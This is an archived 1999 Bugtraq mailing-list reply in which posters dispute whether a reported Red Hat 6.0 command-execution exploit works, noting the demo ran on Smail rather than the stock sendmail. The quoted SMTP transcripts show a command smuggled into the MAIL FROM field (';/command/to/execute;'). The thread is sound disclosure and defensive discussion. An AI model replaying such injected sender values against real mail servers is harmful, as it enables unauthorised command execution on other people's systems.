Bugtraq mailing list archives
Re: RH6.0 local/remote command execution
From: dcrawford () ERAC COM (Danny Crawford)
Date: Fri, 8 Oct 1999 16:06:01 -0500
That does not look like the MTA that comes with RH 6.0. That is smail not sendmail. I tryed this on my RH 6.0 install and it didn't work. Notice the "220 fear62 Smail-3.2" It's not sendmail. -----Original Message----- From: Bugtraq List [mailto:BUGTRAQ () SECURITYFOCUS COM]On Behalf Of Neezam Haniff Sent: Wednesday, October 06, 1999 12:50 PM To: BUGTRAQ () SECURITYFOCUS COM Subject: RH6.0 local/remote command execution Hi, Here are some comments below...
The remote exploit is merely: bash-2.03$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999
11:31:13 -0500
(CDT) MAIL FROM: ;/command/to/execute; 250 <;/command/to/execute;> ... Sender Okay RCPT TO: rpmmail 250 <rpmmail> ... Recipient Okay data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit
I find this odd that this exploit could exist on a Red Hat 6.0 installation. sendmail 8.9.3 is the mailer that is installed and the way it's been configured, there's no way it would accept that sender address since it's not qualifiable. Please confirm this. This is what I get when I test this scenario on a Red Hat 6.0 system: [[nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400 helo x.x 250 dhcp-160-190.x.x Hello IDENT:250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you MAIL FROM: ;/command/to/execute; 553 ;/command/to/execute;... Domain name required The only way someone could take advantage of this exploit is if their mailer configuration allows for the sender to non-qualifiable. Neezam.
Current thread:
- RH6.0 local/remote command execution Brock Tellier (Oct 04)
- <Possible follow-ups>
- Re: RH6.0 local/remote command execution Danny Crawford (Oct 08)
- Re: RH6.0 local/remote command execution Brock Tellier (Oct 11)
- Re: RH6.0 local/remote command execution Brock Tellier (Oct 12)